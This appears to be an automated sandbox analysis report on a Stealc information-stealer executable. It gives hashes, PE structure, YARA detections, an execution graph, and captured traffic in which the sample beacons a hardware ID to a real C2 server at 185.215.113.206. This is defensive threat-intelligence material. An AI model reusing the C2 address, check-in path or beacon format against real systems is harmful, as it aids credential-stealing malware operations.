 | Invoice_Billing_carolinadunesbh.com_6995261057.html | Get hash | malicious | Unknown | Browse | 13.107.246.63
 | file.exe | Get hash | malicious | LummaC | Browse | 13.107.246.63
 | https://app.smartsheet.com/b/form/9141bdd4d7da45789170a7064a677627 | Get hash | malicious | HTMLPhisher | Browse | 13.107.246.63
 | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse | 13.107.246.63
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206
 | file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | Browse | 185.215.113.206
 | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse | 185.215.113.206
                              No context
                              No context
                              No created / dropped files found
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.945388768802098
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'794'048 bytes
                              MD5:fcab8c77edd9c235497e92d29b6c028d
                              SHA1:5bea36fb1edcb3801f5f7d5dacda5d0ffd5ac020
                              SHA256:ece1bbf67dbee347fca668310d9fcf40f8e736d56bc81fb97e5f12f0d08ab3cb
                              SHA512:a322e25357dbc738e8085deee5d1187ca1a411b5781cb878455e7615b2a7e6f77d70c36a768308c382afe614e5c8618c106155a5a6635c265243714215c83601
                              SSDEEP:49152:pOC+TpfvWttDsNO9XY8Cg1EaaNMSs5Hp:StvWtVfuMX5Hp
                              TLSH:4E853341FD479681CC69793FC2D2DE04F2B0C516886EEAA928900E623767EF7879C57C
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0xa90000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                              Instruction
                              jmp 00007F4F3C7E9C7Ah
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
                              Name | Virtual Address | Virtual Size | Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x1ac | .rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                              (unnamed) | 0x1000 | 0x249000 | 0x16200 | cb4486a3e1d6b5cf3a77c8e6f9489d36 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc | 0x24a000 | 0x1ac | 0x200 | e715e4fadbb1c7df30403e5aae6e71f3 | False | 0.583984375 | data | 4.582249536808511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              (unnamed) | 0x24c000 | 0x2a6000 | 0x200 | 7cb275402be1abd9cc7ed206bd44156e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              cwdxftgy | 0x4f2000 | 0x19d000 | 0x19c200 | d8c0124e11e0a28da06912624ed6cc4d | False | 0.994878748673036 | data | 7.954401218621547 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              bjyaubdj | 0x68f000 | 0x1000 | 0x400 | 8753cad16893f8eed2868cb985776538 | False | 0.7568359375 | data | 5.944562723310159 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant | 0x690000 | 0x3000 | 0x2200 | 76f418ad1ef4049db48510a3f00d4209 | False | 0.06169577205882353 | DOS executable (COM) | 0.6981526959738622 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                              RT_MANIFEST | 0x68dfd0 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
                              DLL | Import
                              kernel32.dll | lstrcpy
                              Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                              2024-11-22T05:16:23.817626+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 49726 | 185.215.113.206 | 80 | TCP
                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              Nov 22, 2024 05:16:21.867851973 CET | 49726 | 80 | 192.168.2.6 | 185.215.113.206
                              Nov 22, 2024 05:16:21.987390041 CET | 80 | 49726 | 185.215.113.206 | 192.168.2.6
                              Nov 22, 2024 05:16:21.987500906 CET | 49726 | 80 | 192.168.2.6 | 185.215.113.206
                              Nov 22, 2024 05:16:21.988171101 CET | 49726 | 80 | 192.168.2.6 | 185.215.113.206
                              Nov 22, 2024 05:16:22.107656002 CET | 80 | 49726 | 185.215.113.206 | 192.168.2.6
                              Nov 22, 2024 05:16:23.363745928 CET | 80 | 49726 | 185.215.113.206 | 192.168.2.6
                              Nov 22, 2024 05:16:23.363883972 CET | 49726 | 80 | 192.168.2.6 | 185.215.113.206
                              Nov 22, 2024 05:16:23.367254972 CET | 49726 | 80 | 192.168.2.6 | 185.215.113.206
                              Nov 22, 2024 05:16:23.486758947 CET | 80 | 49726 | 185.215.113.206 | 192.168.2.6
                              Nov 22, 2024 05:16:23.816792965 CET | 80 | 49726 | 185.215.113.206 | 192.168.2.6
                              Nov 22, 2024 05:16:23.817625999 CET | 49726 | 80 | 192.168.2.6 | 185.215.113.206
                              Nov 22, 2024 05:16:28.819969893 CET | 80 | 49726 | 185.215.113.206 | 192.168.2.6
                              Nov 22, 2024 05:16:28.820055008 CET | 49726 | 80 | 192.168.2.6 | 185.215.113.206
                              Nov 22, 2024 05:16:29.422888994 CET | 49726 | 80 | 192.168.2.6 | 185.215.113.206
                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                              Nov 22, 2024 05:16:14.297274113 CET | 1.1.1.1 | 192.168.2.6 | 0xf64 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
                              Nov 22, 2024 05:16:14.297274113 CET | 1.1.1.1 | 192.168.2.6 | 0xf64 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
                              • 185.215.113.206
                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              0 | 192.168.2.6 | 49726 | 185.215.113.206 | 80 | 5480 | C:\Users\user\Desktop\file.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Nov 22, 2024 05:16:21.988171101 CET | 90 | OUT | GET / HTTP/1.1
                              Host: 185.215.113.206
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Nov 22, 2024 05:16:23.363745928 CET | 203 | IN | HTTP/1.1 200 OK
                              Date: Fri, 22 Nov 2024 04:16:23 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Nov 22, 2024 05:16:23.367254972 CET | 413 | OUT | POST /c4becf79229cb002.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----HDAKJDHIEBFIIDGDGDBA
                              Host: 185.215.113.206
                              Content-Length: 211
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 37 39 43 39 43 43 31 41 37 33 31 35 34 36 30 38 36 36 30 33 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 2d 2d 0d 0a
                              Data Ascii: ------HDAKJDHIEBFIIDGDGDBAContent-Disposition: form-data; name="hwid"7779C9CC1A731546086603------HDAKJDHIEBFIIDGDGDBAContent-Disposition: form-data; name="build"mars------HDAKJDHIEBFIIDGDGDBA--
                              Nov 22, 2024 05:16:23.816792965 CET | 210 | IN | HTTP/1.1 200 OK
                              Date: Fri, 22 Nov 2024 04:16:23 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                              Data Ascii: YmxvY2s=



                              Target ID:0
                              Start time:23:16:16
                              Start date:21/11/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0x390000
                              File size:1'794'048 bytes
                              MD5 hash:FCAB8C77EDD9C235497E92D29B6C028D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2238343431.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2325828976.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true


                                Execution Graph

                                Execution Coverage:4.9%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:16.6%
                                Total number of Nodes:1404
                                Total number of Limit Nodes:28
26919 394a60 2 API calls 26918->26919 26920 393b2b 26919->26920 26921 394a60 2 API calls 26920->26921 26922 393b44 26921->26922 26923 394a60 2 API calls 26922->26923 26924 393b5a 26923->26924 26925 394a60 2 API calls 26924->26925 26926 393b70 26925->26926 26927 394a60 2 API calls 26926->26927 26928 393b86 26927->26928 26929 394a60 2 API calls 26928->26929 26930 393b9c 26929->26930 26931 394a60 2 API calls 26930->26931 26932 393bb2 26931->26932 26933 394a60 2 API calls 26932->26933 26934 393bcb 26933->26934 26935 394a60 2 API calls 26934->26935 26936 393be1 26935->26936 26937 394a60 2 API calls 26936->26937 26938 393bf7 26937->26938 26939 394a60 2 API calls 26938->26939 26940 393c0d 26939->26940 26941 394a60 2 API calls 26940->26941 26942 393c23 26941->26942 26943 394a60 2 API calls 26942->26943 26944 393c39 26943->26944 26945 394a60 2 API calls 26944->26945 26946 393c52 26945->26946 26947 394a60 2 API calls 26946->26947 26948 393c68 26947->26948 26949 394a60 2 API calls 26948->26949 26950 393c7e 26949->26950 26951 394a60 2 API calls 26950->26951 26952 393c94 26951->26952 26953 394a60 2 API calls 26952->26953 26954 393caa 26953->26954 26955 394a60 2 API calls 26954->26955 26956 393cc0 26955->26956 26957 394a60 2 API calls 26956->26957 26958 393cd9 26957->26958 26959 394a60 2 API calls 26958->26959 26960 393cef 26959->26960 26961 394a60 2 API calls 26960->26961 26962 393d05 26961->26962 26963 394a60 2 API calls 26962->26963 26964 393d1b 26963->26964 26965 394a60 2 API calls 26964->26965 26966 393d31 26965->26966 26967 394a60 2 API calls 26966->26967 26968 393d47 26967->26968 26969 394a60 2 API calls 26968->26969 26970 393d60 26969->26970 26971 394a60 2 API calls 26970->26971 26972 393d76 26971->26972 26973 394a60 2 API calls 26972->26973 26974 393d8c 26973->26974 26975 394a60 2 API calls 26974->26975 26976 393da2 26975->26976 26977 394a60 2 API calls 26976->26977 26978 393db8 26977->26978 26979 394a60 2 API calls 26978->26979 26980 393dce 26979->26980 26981 394a60 2 
API calls 26980->26981 26982 393de7 26981->26982 26983 394a60 2 API calls 26982->26983 26984 393dfd 26983->26984 26985 394a60 2 API calls 26984->26985 26986 393e13 26985->26986 26987 394a60 2 API calls 26986->26987 26988 393e29 26987->26988 26989 394a60 2 API calls 26988->26989 26990 393e3f 26989->26990 26991 394a60 2 API calls 26990->26991 26992 393e55 26991->26992 26993 394a60 2 API calls 26992->26993 26994 393e6e 26993->26994 26995 394a60 2 API calls 26994->26995 26996 393e84 26995->26996 26997 394a60 2 API calls 26996->26997 26998 393e9a 26997->26998 26999 394a60 2 API calls 26998->26999 27000 393eb0 26999->27000 27001 394a60 2 API calls 27000->27001 27002 393ec6 27001->27002 27003 394a60 2 API calls 27002->27003 27004 393edc 27003->27004 27005 394a60 2 API calls 27004->27005 27006 393ef5 27005->27006 27007 394a60 2 API calls 27006->27007 27008 393f0b 27007->27008 27009 394a60 2 API calls 27008->27009 27010 393f21 27009->27010 27011 394a60 2 API calls 27010->27011 27012 393f37 27011->27012 27013 394a60 2 API calls 27012->27013 27014 393f4d 27013->27014 27015 394a60 2 API calls 27014->27015 27016 393f63 27015->27016 27017 394a60 2 API calls 27016->27017 27018 393f7c 27017->27018 27019 394a60 2 API calls 27018->27019 27020 393f92 27019->27020 27021 394a60 2 API calls 27020->27021 27022 393fa8 27021->27022 27023 394a60 2 API calls 27022->27023 27024 393fbe 27023->27024 27025 394a60 2 API calls 27024->27025 27026 393fd4 27025->27026 27027 394a60 2 API calls 27026->27027 27028 393fea 27027->27028 27029 394a60 2 API calls 27028->27029 27030 394003 27029->27030 27031 394a60 2 API calls 27030->27031 27032 394019 27031->27032 27033 394a60 2 API calls 27032->27033 27034 39402f 27033->27034 27035 394a60 2 API calls 27034->27035 27036 394045 27035->27036 27037 394a60 2 API calls 27036->27037 27038 39405b 27037->27038 27039 394a60 2 API calls 27038->27039 27040 394071 27039->27040 27041 394a60 2 API calls 27040->27041 27042 39408a 27041->27042 27043 394a60 2 API calls 
27042->27043 27044 3940a0 27043->27044 27045 394a60 2 API calls 27044->27045 27046 3940b6 27045->27046 27047 394a60 2 API calls 27046->27047 27048 3940cc 27047->27048 27049 394a60 2 API calls 27048->27049 27050 3940e2 27049->27050 27051 394a60 2 API calls 27050->27051 27052 3940f8 27051->27052 27053 394a60 2 API calls 27052->27053 27054 394111 27053->27054 27055 394a60 2 API calls 27054->27055 27056 394127 27055->27056 27057 394a60 2 API calls 27056->27057 27058 39413d 27057->27058 27059 394a60 2 API calls 27058->27059 27060 394153 27059->27060 27061 394a60 2 API calls 27060->27061 27062 394169 27061->27062 27063 394a60 2 API calls 27062->27063 27064 39417f 27063->27064 27065 394a60 2 API calls 27064->27065 27066 394198 27065->27066 27067 394a60 2 API calls 27066->27067 27068 3941ae 27067->27068 27069 394a60 2 API calls 27068->27069 27070 3941c4 27069->27070 27071 394a60 2 API calls 27070->27071 27072 3941da 27071->27072 27073 394a60 2 API calls 27072->27073 27074 3941f0 27073->27074 27075 394a60 2 API calls 27074->27075 27076 394206 27075->27076 27077 394a60 2 API calls 27076->27077 27078 39421f 27077->27078 27079 394a60 2 API calls 27078->27079 27080 394235 27079->27080 27081 394a60 2 API calls 27080->27081 27082 39424b 27081->27082 27083 394a60 2 API calls 27082->27083 27084 394261 27083->27084 27085 394a60 2 API calls 27084->27085 27086 394277 27085->27086 27087 394a60 2 API calls 27086->27087 27088 39428d 27087->27088 27089 394a60 2 API calls 27088->27089 27090 3942a6 27089->27090 27091 394a60 2 API calls 27090->27091 27092 3942bc 27091->27092 27093 394a60 2 API calls 27092->27093 27094 3942d2 27093->27094 27095 394a60 2 API calls 27094->27095 27096 3942e8 27095->27096 27097 394a60 2 API calls 27096->27097 27098 3942fe 27097->27098 27099 394a60 2 API calls 27098->27099 27100 394314 27099->27100 27101 394a60 2 API calls 27100->27101 27102 39432d 27101->27102 27103 394a60 2 API calls 27102->27103 27104 394343 27103->27104 27105 394a60 2 API calls 27104->27105 
27106 394359 27105->27106 27107 394a60 2 API calls 27106->27107 27108 39436f 27107->27108 27109 394a60 2 API calls 27108->27109 27110 394385 27109->27110 27111 394a60 2 API calls 27110->27111 27112 39439b 27111->27112 27113 394a60 2 API calls 27112->27113 27114 3943b4 27113->27114 27115 394a60 2 API calls 27114->27115 27116 3943ca 27115->27116 27117 394a60 2 API calls 27116->27117 27118 3943e0 27117->27118 27119 394a60 2 API calls 27118->27119 27120 3943f6 27119->27120 27121 394a60 2 API calls 27120->27121 27122 39440c 27121->27122 27123 394a60 2 API calls 27122->27123 27124 394422 27123->27124 27125 394a60 2 API calls 27124->27125 27126 39443b 27125->27126 27127 394a60 2 API calls 27126->27127 27128 394451 27127->27128 27129 394a60 2 API calls 27128->27129 27130 394467 27129->27130 27131 394a60 2 API calls 27130->27131 27132 39447d 27131->27132 27133 394a60 2 API calls 27132->27133 27134 394493 27133->27134 27135 394a60 2 API calls 27134->27135 27136 3944a9 27135->27136 27137 394a60 2 API calls 27136->27137 27138 3944c2 27137->27138 27139 394a60 2 API calls 27138->27139 27140 3944d8 27139->27140 27141 394a60 2 API calls 27140->27141 27142 3944ee 27141->27142 27143 394a60 2 API calls 27142->27143 27144 394504 27143->27144 27145 394a60 2 API calls 27144->27145 27146 39451a 27145->27146 27147 394a60 2 API calls 27146->27147 27148 394530 27147->27148 27149 394a60 2 API calls 27148->27149 27150 394549 27149->27150 27151 394a60 2 API calls 27150->27151 27152 39455f 27151->27152 27153 394a60 2 API calls 27152->27153 27154 394575 27153->27154 27155 394a60 2 API calls 27154->27155 27156 39458b 27155->27156 27157 394a60 2 API calls 27156->27157 27158 3945a1 27157->27158 27159 394a60 2 API calls 27158->27159 27160 3945b7 27159->27160 27161 394a60 2 API calls 27160->27161 27162 3945d0 27161->27162 27163 394a60 2 API calls 27162->27163 27164 3945e6 27163->27164 27165 394a60 2 API calls 27164->27165 27166 3945fc 27165->27166 27167 394a60 2 API calls 27166->27167 27168 394612 
27167->27168 27169 394a60 2 API calls 27168->27169 27170 394628 27169->27170 27171 394a60 2 API calls 27170->27171 27172 39463e 27171->27172 27173 394a60 2 API calls 27172->27173 27174 394657 27173->27174 27175 394a60 2 API calls 27174->27175 27176 39466d 27175->27176 27177 394a60 2 API calls 27176->27177 27178 394683 27177->27178 27179 394a60 2 API calls 27178->27179 27180 394699 27179->27180 27181 394a60 2 API calls 27180->27181 27182 3946af 27181->27182 27183 394a60 2 API calls 27182->27183 27184 3946c5 27183->27184 27185 394a60 2 API calls 27184->27185 27186 3946de 27185->27186 27187 394a60 2 API calls 27186->27187 27188 3946f4 27187->27188 27189 394a60 2 API calls 27188->27189 27190 39470a 27189->27190 27191 394a60 2 API calls 27190->27191 27192 394720 27191->27192 27193 394a60 2 API calls 27192->27193 27194 394736 27193->27194 27195 394a60 2 API calls 27194->27195 27196 39474c 27195->27196 27197 394a60 2 API calls 27196->27197 27198 394765 27197->27198 27199 394a60 2 API calls 27198->27199 27200 39477b 27199->27200 27201 394a60 2 API calls 27200->27201 27202 394791 27201->27202 27203 394a60 2 API calls 27202->27203 27204 3947a7 27203->27204 27205 394a60 2 API calls 27204->27205 27206 3947bd 27205->27206 27207 394a60 2 API calls 27206->27207 27208 3947d3 27207->27208 27209 394a60 2 API calls 27208->27209 27210 3947ec 27209->27210 27211 394a60 2 API calls 27210->27211 27212 394802 27211->27212 27213 394a60 2 API calls 27212->27213 27214 394818 27213->27214 27215 394a60 2 API calls 27214->27215 27216 39482e 27215->27216 27217 394a60 2 API calls 27216->27217 27218 394844 27217->27218 27219 394a60 2 API calls 27218->27219 27220 39485a 27219->27220 27221 394a60 2 API calls 27220->27221 27222 394873 27221->27222 27223 394a60 2 API calls 27222->27223 27224 394889 27223->27224 27225 394a60 2 API calls 27224->27225 27226 39489f 27225->27226 27227 394a60 2 API calls 27226->27227 27228 3948b5 27227->27228 27229 394a60 2 API calls 27228->27229 27230 3948cb 27229->27230 
27231 394a60 2 API calls 27230->27231 27232 3948e1 27231->27232 27233 394a60 2 API calls 27232->27233 27234 3948fa 27233->27234 27235 394a60 2 API calls 27234->27235 27236 394910 27235->27236 27237 394a60 2 API calls 27236->27237 27238 394926 27237->27238 27239 394a60 2 API calls 27238->27239 27240 39493c 27239->27240 27241 394a60 2 API calls 27240->27241 27242 394952 27241->27242 27243 394a60 2 API calls 27242->27243 27244 394968 27243->27244 27245 394a60 2 API calls 27244->27245 27246 394981 27245->27246 27247 394a60 2 API calls 27246->27247 27248 394997 27247->27248 27249 394a60 2 API calls 27248->27249 27250 3949ad 27249->27250 27251 394a60 2 API calls 27250->27251 27252 3949c3 27251->27252 27253 394a60 2 API calls 27252->27253 27254 3949d9 27253->27254 27255 394a60 2 API calls 27254->27255 27256 3949ef 27255->27256 27257 394a60 2 API calls 27256->27257 27258 394a08 27257->27258 27259 394a60 2 API calls 27258->27259 27260 394a1e 27259->27260 27261 394a60 2 API calls 27260->27261 27262 394a34 27261->27262 27263 394a60 2 API calls 27262->27263 27264 394a4a 27263->27264 27265 3b66e0 27264->27265 27266 3b6afe 8 API calls 27265->27266 27267 3b66ed 43 API calls 27265->27267 27268 3b6c08 27266->27268 27269 3b6b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27266->27269 27267->27266 27270 3b6cd2 27268->27270 27271 3b6c15 8 API calls 27268->27271 27269->27268 27272 3b6cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27270->27272 27273 3b6d4f 27270->27273 27271->27270 27272->27273 27274 3b6de9 27273->27274 27275 3b6d5c 6 API calls 27273->27275 27276 3b6f10 27274->27276 27277 3b6df6 12 API calls 27274->27277 27275->27274 27278 3b6f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27276->27278 27279 3b6f8d 27276->27279 27277->27276 27278->27279 27280 3b6fc1 27279->27280 27281 3b6f96 GetProcAddress GetProcAddress 27279->27281 27282 3b6fca GetProcAddress GetProcAddress 27280->27282 27283 
3b6ff5 27280->27283 27281->27280 27282->27283 27284 3b70ed 27283->27284 27285 3b7002 10 API calls 27283->27285 27286 3b7152 27284->27286 27287 3b70f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27284->27287 27285->27284 27288 3b715b GetProcAddress 27286->27288 27289 3b716e 27286->27289 27287->27286 27288->27289 27290 3b051f 27289->27290 27291 3b7177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27289->27291 27292 391530 27290->27292 27291->27290 27601 391610 27292->27601 27294 39153b 27295 391555 lstrcpy 27294->27295 27296 39155d 27294->27296 27295->27296 27297 391577 lstrcpy 27296->27297 27298 39157f 27296->27298 27297->27298 27299 391599 lstrcpy 27298->27299 27301 3915a1 27298->27301 27299->27301 27300 391605 27303 3af1b0 lstrlen 27300->27303 27301->27300 27302 3915fd lstrcpy 27301->27302 27302->27300 27304 3af1e4 27303->27304 27305 3af1eb lstrcpy 27304->27305 27306 3af1f7 lstrlen 27304->27306 27305->27306 27307 3af208 27306->27307 27308 3af21b lstrlen 27307->27308 27309 3af20f lstrcpy 27307->27309 27310 3af22c 27308->27310 27309->27308 27311 3af233 lstrcpy 27310->27311 27312 3af23f 27310->27312 27311->27312 27313 3af258 lstrcpy 27312->27313 27314 3af264 27312->27314 27313->27314 27315 3af286 lstrcpy 27314->27315 27316 3af292 27314->27316 27315->27316 27317 3af2ba lstrcpy 27316->27317 27318 3af2c6 27316->27318 27317->27318 27319 3af2ea lstrcpy 27318->27319 27380 3af300 27318->27380 27319->27380 27320 3af30c lstrlen 27320->27380 27321 3af4b9 lstrcpy 27321->27380 27322 3af3a1 lstrcpy 27322->27380 27323 3af3c5 lstrcpy 27323->27380 27324 3af4e8 lstrcpy 27384 3af4f0 27324->27384 27325 3af479 lstrcpy 27325->27380 27326 3af59c lstrcpy 27326->27384 27327 3af70f StrCmpCA 27332 3afe8e 27327->27332 27327->27380 27328 3af616 StrCmpCA 27328->27327 27328->27384 27329 3afa29 StrCmpCA 27340 3afe2b 27329->27340 27329->27380 27330 3af73e lstrlen 27330->27380 27331 3afead lstrlen 27343 3afec7 27331->27343 27332->27331 27338 3afea5 lstrcpy 27332->27338 
27333 3afd4d StrCmpCA 27335 3afd60 Sleep 27333->27335 27345 3afd75 27333->27345 27334 3afa58 lstrlen 27334->27380 27335->27380 27336 3af64a lstrcpy 27336->27384 27337 391530 8 API calls 27337->27384 27338->27331 27339 3afe4a lstrlen 27353 3afe64 27339->27353 27340->27339 27341 3afe42 lstrcpy 27340->27341 27341->27339 27342 3af89e lstrcpy 27342->27380 27344 3afee7 lstrlen 27343->27344 27348 3afedf lstrcpy 27343->27348 27351 3aff01 27344->27351 27346 3afd94 lstrlen 27345->27346 27349 3afd8c lstrcpy 27345->27349 27355 3afdae 27346->27355 27347 3af76f lstrcpy 27347->27380 27348->27344 27349->27346 27350 3afbb8 lstrcpy 27350->27380 27361 3aff21 27351->27361 27364 3aff19 lstrcpy 27351->27364 27352 3afa89 lstrcpy 27352->27380 27354 3afdce lstrlen 27353->27354 27356 3afe7c lstrcpy 27353->27356 27363 3afde8 27354->27363 27355->27354 27368 3afdc6 lstrcpy 27355->27368 27356->27354 27357 3af791 lstrcpy 27357->27380 27359 391530 8 API calls 27359->27380 27360 3af8cd lstrcpy 27360->27384 27365 391610 4 API calls 27361->27365 27362 3afbe7 lstrcpy 27362->27384 27370 3afe08 27363->27370 27372 3afe00 lstrcpy 27363->27372 27364->27361 27387 3afe13 27365->27387 27366 3afaab lstrcpy 27366->27380 27367 3af698 lstrcpy 27367->27384 27368->27354 27369 3aefb0 35 API calls 27369->27384 27373 391610 4 API calls 27370->27373 27371 3aee90 28 API calls 27371->27380 27372->27370 27373->27387 27374 3af7e2 lstrcpy 27374->27380 27375 3af924 lstrcpy 27375->27384 27376 3af99e StrCmpCA 27376->27329 27376->27384 27377 3afafc lstrcpy 27377->27380 27378 3afc3e lstrcpy 27378->27384 